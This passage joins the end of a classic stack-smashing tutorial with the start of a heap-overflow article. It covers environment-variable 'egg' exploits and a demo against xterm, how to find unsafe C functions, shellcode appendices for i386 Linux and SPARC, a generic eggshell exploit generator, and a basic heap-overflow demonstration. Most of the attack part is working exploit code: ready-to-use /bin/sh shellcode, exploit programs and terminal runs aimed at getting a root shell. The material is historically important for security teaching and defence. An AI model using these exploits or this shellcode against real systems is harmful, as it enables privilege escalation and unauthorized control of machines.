ûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿
Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ
¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ
Warning: some arguments in previous message were lost
bash$
------------------------------------------------------------------------------
Eureka! Less than a dozen tries and we found the magic numbers. If xterm
were installed suid root this would now be a root shell.
Small Buffer Overflows
~~~~~~~~~~~~~~~~~~~~~~
There will be times when the buffer you are trying to overflow is so
small that either the shellcode won't fit into it, and it will overwrite the
return address with instructions instead of the address of our code, or the
number of NOPs you can pad the front of the string with is so small that the
chances of guessing their address is minuscule. To obtain a shell from these
programs we will have to go about it another way. This particular approach
only works when you have access to the program's environment variables.
What we will do is place our shellcode in an environment variable, and
then overflow the buffer with the address of this variable in memory. This
method also increases your chances of the exploit working as you can make
the environment variable holding the shell code as large as you want.
The environment variables are stored at the top of the stack when the
program is started; any modifications made by setenv() are then allocated
elsewhere. The stack at the beginning then looks like this:
<strings><argv pointers>NULL<envp pointers>NULL<argc><argv><envp>
Our new program will take an extra variable, the size of the variable
containing the shellcode and NOPs. Our new exploit now looks like this:
exploit4.c
------------------------------------------------------------------------------
#include
#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 512
#define DEFAULT_EGG_SIZE 2048
#define NOP 0x90
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
unsigned long get_esp(void) {
__asm__("movl %esp,%eax");
}
void main(int argc, char *argv[]) {
char *buff, *ptr, *egg;
long *addr_ptr, addr;
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
int i, eggsize=DEFAULT_EGG_SIZE;
if (argc > 1) bsize = atoi(argv[1]);
if (argc > 2) offset = atoi(argv[2]);
if (argc > 3) eggsize = atoi(argv[3]);
if (!(buff = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
if (!(egg = malloc(eggsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
addr = get_esp() - offset;
printf("Using address: 0x%x\n", addr);
ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;
ptr = egg;
for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
*(ptr++) = NOP;
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
buff[bsize - 1] = '\0';
egg[eggsize - 1] = '\0';
memcpy(egg,"EGG=",4);
putenv(egg);
memcpy(buff,"RET=",4);
putenv(buff);
system("/bin/bash");
}
------------------------------------------------------------------------------
Let's try our new exploit with our vulnerable test program:
------------------------------------------------------------------------------
[aleph1]$ ./exploit4 768
Using address: 0xbffffdb0
[aleph1]$ ./vulnerable $RET
$
------------------------------------------------------------------------------
Works like a charm. Now let's try it on xterm:
------------------------------------------------------------------------------
[aleph1]$ export DISPLAY=:0.0
[aleph1]$ ./exploit4 2148
Using address: 0xbffffdb0
[aleph1]$ /usr/X11R6/bin/xterm -fg $RET
Warning: Color name
"°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤
ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°
¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿
°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ
¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤
ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°
¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿
°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ
¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤
ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿÿ¿°¤ÿ¿
°¤ÿ¿°¤ÿ¿°¤
Warning: some arguments in previous message were lost
$
------------------------------------------------------------------------------
On the first try! It has certainly increased our odds. Depending on how
much environment data the exploit program has compared with the program
you are trying to exploit, the guessed address may be too low or too high.
Experiment with both positive and negative offsets.
Finding Buffer Overflows
~~~~~~~~~~~~~~~~~~~~~~~~
As stated earlier, buffer overflows are the result of stuffing more
information into a buffer than it is meant to hold. Since C does not have any
built-in bounds checking, overflows often manifest themselves as writing past
the end of a character array. The standard C library provides a number of
functions for copying or appending strings that perform no boundary checking.
They include: strcat(), strcpy(), sprintf(), and vsprintf(). These functions
operate on null-terminated strings, and do not check for overflow of the
receiving string. gets() is a function that reads a line from stdin into
a buffer until either a terminating newline or EOF. It performs no checks for
buffer overflows. The scanf() family of functions can also be a problem if
you are matching a sequence of non-white-space characters (%s), or matching a
non-empty sequence of characters from a specified set (%[]), and the array
pointed to by the char pointer, is not large enough to accept the whole
sequence of characters, and you have not defined the optional maximum field
width. If the target of any of these functions is a buffer of static size,
and its other argument was somehow derived from user input, there is a good
possibility that you might be able to exploit a buffer overflow.
Another common programming construct is the use of a while loop to
read one character at a time into a buffer from stdin or some file until the
end of line, end of file, or some other delimiter is reached. This type of
construct usually uses one of these functions: getc(), fgetc(), or getchar().
If there are no explicit checks for overflows in the while loop, such programs
are easily exploited.
To conclude, grep(1) is your friend. The sources for free operating
systems and their utilities are readily available. This fact becomes quite
interesting once you realize that many commercial operating system utilities
were derived from the same sources as the free ones. Use the source d00d.
Appendix A - Shellcode for Different Operating Systems/Architectures
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
i386/Linux
------------------------------------------------------------------------------
jmp 0x1f
popl %esi
movl %esi,0x8(%esi)
xorl %eax,%eax
movb %eax,0x7(%esi)
movl %eax,0xc(%esi)
movb $0xb,%al
movl %esi,%ebx
leal 0x8(%esi),%ecx
leal 0xc(%esi),%edx
int $0x80
xorl %ebx,%ebx
movl %ebx,%eax
inc %eax
int $0x80
call -0x24
.string \"/bin/sh\"
------------------------------------------------------------------------------
SPARC/Solaris
------------------------------------------------------------------------------
sethi 0xbd89a, %l6
or %l6, 0x16e, %l6
sethi 0xbdcda, %l7
and %sp, %sp, %o0
add %sp, 8, %o1
xor %o2, %o2, %o2
add %sp, 16, %sp
std %l6, [%sp - 16]
st %sp, [%sp - 8]
st %g0, [%sp - 4]
mov 0x3b, %g1
ta 8
xor %o7, %o7, %o0
mov 1, %g1
ta 8
------------------------------------------------------------------------------
SPARC/SunOS
------------------------------------------------------------------------------
sethi 0xbd89a, %l6
or %l6, 0x16e, %l6
sethi 0xbdcda, %l7
and %sp, %sp, %o0
add %sp, 8, %o1
xor %o2, %o2, %o2
add %sp, 16, %sp
std %l6, [%sp - 16]
st %sp, [%sp - 8]
st %g0, [%sp - 4]
mov 0x3b, %g1
mov -0x1, %l5
ta %l5 + 1
xor %o7, %o7, %o0
mov 1, %g1
ta %l5 + 1
------------------------------------------------------------------------------
Appendix B - Generic Buffer Overflow Program
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
shellcode.h
------------------------------------------------------------------------------
#if defined(__i386__) && defined(__linux__)
#define NOP_SIZE 1
char nop[] = "\x90";
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
unsigned long get_sp(void) {
__asm__("movl %esp,%eax");
}
#elif defined(__sparc__) && defined(__sun__) && defined(__svr4__)
#define NOP_SIZE 4
char nop[]="\xac\x15\xa1\x6e";
char shellcode[] =
"\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xdc\xda\x90\x0b\x80\x0e"
"\x92\x03\xa0\x08\x94\x1a\x80\x0a\x9c\x03\xa0\x10\xec\x3b\xbf\xf0"
"\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\x91\xd0\x20\x08"
"\x90\x1b\xc0\x0f\x82\x10\x20\x01\x91\xd0\x20\x08";
unsigned long get_sp(void) {
__asm__("or %sp, %sp, %i0");
}
#elif defined(__sparc__) && defined(__sun__)
#define NOP_SIZE 4
char nop[]="\xac\x15\xa1\x6e";
char shellcode[] =
"\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xdc\xda\x90\x0b\x80\x0e"
"\x92\x03\xa0\x08\x94\x1a\x80\x0a\x9c\x03\xa0\x10\xec\x3b\xbf\xf0"
"\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\xaa\x10\x3f\xff"
"\x91\xd5\x60\x01\x90\x1b\xc0\x0f\x82\x10\x20\x01\x91\xd5\x60\x01";
unsigned long get_sp(void) {
__asm__("or %sp, %sp, %i0");
}
#endif
------------------------------------------------------------------------------
eggshell.c
------------------------------------------------------------------------------
/*
* eggshell v1.0
*
* Aleph One / aleph1@underground.org
*/
#include
#include
#include "shellcode.h"
#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 512
#define DEFAULT_EGG_SIZE 2048
void usage(void);
void main(int argc, char *argv[]) {
char *ptr, *bof, *egg;
long *addr_ptr, addr;
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
int i, n, m, c, align=0, eggsize=DEFAULT_EGG_SIZE;
while ((c = getopt(argc, argv, "a:b:e:o:")) != EOF)
switch (c) {
case 'a':
align = atoi(optarg);
break;
case 'b':
bsize = atoi(optarg);
break;
case 'e':
eggsize = atoi(optarg);
break;
case 'o':
offset = atoi(optarg);
break;
case '?':
usage();
exit(0);
}
if (strlen(shellcode) > eggsize) {
printf("Shellcode is larger than the egg.\n");
exit(0);
}
if (!(bof = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
if (!(egg = malloc(eggsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
addr = get_sp() - offset;
printf("[ Buffer size:\t%d\t\tEgg size:\t%d\tAlignment:\t%d\t]\n",
bsize, eggsize, align);
printf("[ Address:\t0x%x\tOffset:\t\t%d\t\t\t\t]\n", addr, offset);
addr_ptr = (long *) bof;
for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;
ptr = egg;
for (i = 0; i <= eggsize - strlen(shellcode) - NOP_SIZE; i += NOP_SIZE)
for (n = 0; n < NOP_SIZE; n++) {
m = (n + align) % NOP_SIZE;
*(ptr++) = nop[m];
}
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
bof[bsize - 1] = '\0';
egg[eggsize - 1] = '\0';
memcpy(egg,"EGG=",4);
putenv(egg);
memcpy(bof,"BOF=",4);
putenv(bof);
system("/bin/sh");
}
void usage(void) {
(void)fprintf(stderr,
"usage: eggshell [-a ] [-b ] [-e ] [-o ]\n");
}
------------------------------------------------------------------------------
Subject: w00w00 on Heap Overflows
This is a PRELIMINARY BETA VERSION of our final article! We apologize for
any mistakes. We still need to add a few more things.
[ Note: You may also get this article off of ]
[ http://www.w00w00.org/articles.html. ]
w00w00 on Heap Overflows
By: Matt Conover (a.k.a. Shok) & w00w00 Security Team
------------------------------------------------------------------------------
Copyright (C) January 1999, Matt Conover & w00w00 Security Development
You may freely redistribute or republish this article, provided the
following conditions are met:
1. This article is left intact (no changes made, the full article
published, etc.)
2. Proper credit is given to its authors; Matt Conover (Shok) and the
w00w00 Security Development (WSD).
You are free to rewrite your own articles based on this material (assuming
the above conditions are met). It'd also be appreciated if an e-mail is
sent to either mattc@repsec.com or shok@dataforce.net to let us know you
are going to be republishing this article or writing an article based upon
one of our ideas.
------------------------------------------------------------------------------
Prelude:
Heap/BSS-based overflows are fairly common in applications today; yet,
they are rarely reported. Therefore, we felt it was appropriate to
present a "heap overflow" tutorial. The biggest critics of this article
will probably be those who argue heap overflows have been around for a
while. Of course they have, but that doesn't negate the need for such
material.
In this article, we will refer to "overflows involving the stack" as
"stack-based overflows" ("stack overflow" is misleading) and "overflows
involving the heap" as "heap-based overflows".
This article should provide the following: a better understanding
of heap-based overflows along with several methods of exploitation,
demonstrations, and some possible solutions/fixes. Prerequisites to
this article: a general understanding of computer architecture,
assembly, C, and stack overflows.
This is a collection of the insights we have gained through our research
with heap-based overflows and the like. We have written all the
examples and exploits included in this article; therefore, the copyright
applies to them as well.
Why Heap/BSS Overflows are Significant
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
As more system vendors add non-executable stack patches, or individuals
apply their own patches (e.g., Solar Designer's non-executable stack
patch), a different method of penetration is needed by security
consultants (or else, we won't have jobs!). Let me give you a few
examples:
1. Searching for the word "heap" on BugTraq (for the archive, see
www.geek-girl.com/bugtraq), yields only 40+ matches, whereas
"stack" yields 2300+ matches (though several are irrelevant). Also,
"stack overflow" gives twice as many matches as "heap" does.
2. Solaris (an OS developed by Sun Microsystems), as of Solaris
2.6 on sparc, includes a "protect_stack" option, but not an
equivalent "protect_heap" option. Fortunately, the bss is not
executable (and need not be).
3. There is a "StackGuard" (developed by Crispin Cowan et al.), but
no equivalent "HeapGuard".
4. Using a heap/bss-based overflow was one of the "potential" methods
of getting around StackGuard. The following was posted to BugTraq
by Tim Newsham several months ago:
> Finally the precomputed canary values may be a target
> themselves. If there is an overflow in the data or bss segments
> preceding the precomputed canary vector, an attacker can simply
> overwrite all the canary values with a single value of his
> choosing, effectively turning off stack protection.
5. Some people have actually suggested making a "local" buffer a
"static" buffer, as a fix! This is not very wise; yet, it is a fairly
common misconception of how the heap or bss work.
Although heap-based overflows are not new, they don't seem to be well
understood.
Note:
One argument is that the presentation of a "heap-based overflow" is
equivalent to a "stack-based overflow" presentation. However, only a
small proportion of this article has the same presentation (if you
will) that is equivalent to that of a "stack-based overflow".
People go out of their way to prevent stack-based overflows, but leave
their heap/bss completely open! On most systems, heap and bss are
both executable and writeable (an excellent combination). This makes
heap/bss overflows very possible. But, I don't see any reason for the
bss to be executable! What is going to be executed in zero-filled
memory?!
For the security consultant (the ones doing the penetration assessment),
most heap-based overflows are system and architecture independent,
including those with non-executable heaps. This will all be demonstrated
in the "Exploiting Heap/BSS Overflows" section.
Terminology
~~~~~~~~~~~
An executable file, such as an ELF (Executable and Linking Format)
executable, has several "sections", such as: the
PLT (Procedure Linkage Table), GOT (Global Offset Table), init
(instructions executed on initialization), fini (instructions to be
executed upon termination), and ctors and dtors (which contain global
constructors/destructors).
"Memory that is dynamically allocated by the application is known as the
heap." The words "by the application" are important here, as on good
systems most areas are in fact dynamically allocated at the kernel level,
while for the heap, the allocation is requested by the application.
Heap and Data/BSS Sections
~~~~~~~~~~~~~~~~~~~~~~~~~~
The heap is an area in memory that is dynamically allocated by the
application. The data section is initialized at compile-time.
The bss section contains uninitialized data, and is allocated at
run-time. Until it is written to, it remains zeroed (at least from
the application's point-of-view).
Note:
When we refer to a "heap-based overflow" in the sections below, we are
most likely referring to buffer overflows of both the heap and data/bss
sections.
On most systems, the heap grows up (towards higher addresses). Hence,
when we say "X is below Y," it means X is lower in memory than Y.
Exploiting Heap/BSS Overflows
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
In this section, we'll cover several different methods to put heap/bss
overflows to use. Most of the examples for Unix-derived x86 systems will
also work in DOS and Windows (with a few changes). We've also included
a few DOS/Windows specific exploitation methods. An advance warning:
this will be the longest section, and should be studied the most.
Note:
In this article, I use the "exact offset" approach. The offset
must be closely approximated to its actual value. The alternative is the
"stack-based overflow approach" (if you will), where one repeats the
addresses to increase the likelihood of a successful exploit.
While this example may seem unnecessary, we're including a quick
demonstration for those who are unfamiliar with heap-based overflows:
-----------------------------------------------------------------------------
/* demonstrates dynamic overflow in heap (initialized data) */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#define BUFSIZE 16
#define OVERSIZE 8 /* overflow buf2 by OVERSIZE bytes */
int main()
{
u_long diff;
char *buf1 = (char *)malloc(BUFSIZE), *buf2 = (char *)malloc(BUFSIZE);
diff = (u_long)buf2 - (u_long)buf1;
printf("buf1 = %p, buf2 = %p, diff = 0x%x bytes\n", buf1, buf2, diff);
memset(buf2, 'A', BUFSIZE-1), buf2[BUFSIZE-1] = '\0';
printf("before overflow: buf2 = %s\n", buf2);
memset(buf1, 'B', (u_int)(diff + OVERSIZE));
printf("after overflow: buf2 = %s\n", buf2);
return 0;
}
-----------------------------------------------------------------------------
If we run this, we'll get the following:
[root /w00w00/heap/examples/basic]# ./heap1 8
buf1 = 0x804e000, buf2 = 0x804eff0, diff = 0xff0 bytes
before overflow: buf2 = AAAAAAAAAAAAAAA
after overflow: buf2 = BBBBBBBBAAAAAAA
This works because buf1 overruns its boundaries into buf2's heap space.
But, because buf2's heap space is still valid (heap) memory, the program
doesn't crash.
Note:
A possible fix for a heap-based overflow, which will be mentioned
later, is to put "canary" values between all variables on the heap
space (like those of StackGuard, also discussed later) that mustn't be
